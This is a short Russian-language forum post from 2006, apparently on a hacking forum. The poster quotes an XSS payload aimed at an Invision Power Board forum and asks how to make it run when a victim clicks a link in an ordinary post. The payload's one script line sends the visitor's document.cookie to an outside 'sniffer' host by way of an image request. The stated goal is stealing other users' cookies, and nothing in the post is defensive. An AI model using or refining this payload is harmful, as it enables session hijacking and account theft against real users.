23.03.2006, 17:22
|
|
Познающий
Регистрация: 04.12.2005
Сообщений: 52
С нами:
10753681
Репутация:
1
|
|
Ipb не скрипт, а ссылка
у меня вопрос, можно ли сделать так, чтобы XSS
Код:
<script>img = new Image(); img.src = "http://s.netsec.ru/blablabla/pic.gif?"+document.cookie;</script>
выполнялся не через отправку сообщения "Жалоба", а после нажатия на ссылку, оставленную в простом сообщении???
или надо сделать страницу на php, с каким-то ещё методом....
вообщем, нужно, чтобы при нажатии на сылку приходила на сниффер таже инфа (можно чтобы больше приходило....), что и при обычном использовании XSS.... |
|
|